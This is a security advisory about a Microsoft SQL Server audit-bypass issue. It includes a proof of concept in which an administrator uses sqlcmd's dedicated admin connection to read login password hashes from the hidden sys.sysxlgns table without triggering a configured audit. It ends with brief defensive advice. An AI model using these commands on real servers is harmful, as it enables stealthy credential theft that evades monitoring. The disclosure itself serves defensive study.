Title: Microsoft SQL Server Password Hash Exposure Product: Database Manufacturer: Microsoft Affected Version(s): 2012-2022 Risk Level: Medium CVE Reference: N/A Author of Advisory: Emad Al-Mousa Overview: SQL Server is a popular database system, and database systems are a vital backbone in IT infrastructure as different types of systems and applications will require back-end data-store (databsae system). Moreover, Password hashes for Local database accounts are restricted in terms of permission access and only system admins/ DBA's can access them. of course, attackers will attempt to access them to crack the hashes and access the database system for data exfiltration. ***************************************** Vulnerability Details: The following exploit assumes attacker escalated his permission as admin, and he/she will be able extract the password hashes even though an audit is in-place. So, its an audit by pass vulnerability. currently, SQL Server password hashes are stored in two tables: sys.sql_logins ----> visible table and auditing can be configured against it sys.sysxlgns -----> invisible table and requires special access mode and audit rule is not functional ! ***************************************** Proof of Concept (PoC): I will simulate a way to extract password hashes in a stealthy way (auditing will not capture it), in the following PoC the account is called dodo: Accessing windows server as administrator, open CMD session using the following command: sqlcmd -S localhost\MSSQL2019 -A -E USE [master] GO select name,pwdhash from sys.sysxlgns where name='dodo'; GO The password hashes for account “dodo” will be displayed. Let us create an audit rule using this method to capture “select” statements executed against sys.sysxlgns : I will create a server-level audit to push audit logs as “binary file”: USE [master] GO CREATE SERVER AUDIT [Audit-2020-SYSTEM-TABLE] TO FILE ( FILEPATH = N’D:\mssq_audit\’ ,MAXSIZE = 0 MB ,MAX_ROLLOVER_FILES = 2147483647 ,RESERVE_DISK_SPACE = OFF ) WITH ( QUEUE_DELAY = 1000 ,ON_FAILURE = CONTINUE ,AUDIT_GUID = ‘0333dfad-260b-45a4-8302-d7eb94c14cdc’ ) ALTER SERVER AUDIT [Audit-2020-SYSTEM-TABLE] WITH (STATE = ON) GO Then, I will define a database level audit under “MASTER” database to audit SELECT statement by any user/account against the system table sys.sysxlgns as follows: sqlcmd -S localhost\MSSQL2019 -A -E USE [master] GO CREATE DATABASE AUDIT SPECIFICATION [audit-systemtable] FOR SERVER AUDIT [Audit-2020-SYSTEM-TABLE] ADD (SELECT ON OBJECT::[sys].[sysxlgns] BY [public]) WITH (STATE = ON) GO The audit specification will be successfully created and can be visibly seen in SQL Server management studio. Now you attempt to execute select statement again: sqlcmd -S localhost\MSSQL2019 -A -E USE [master] GO select name,pwdhash from sys.sysxlgns where name='dodo'; GO - checking audit logs.....nothing is recorded ! Conclustion: Super users and admin accounts must be monitored/audited for real-time monitoring for threat detection, and for future forensic analysis ! ***************************************** - Defensive Techniques: configure Operating System Security auditing and Monitoring. Network Segmentation and Firewall. pro-actively patch your systems and database systems. ***************************************** References: https://databasesecurityninja.wordpress.com/2020/06/02/extract-sql-server-database-password-hashes-without-a-trace/ https://learn.microsoft.com/en-us/sql/relational-databases/system-tables/system-base-tables?view=sql-server-ver16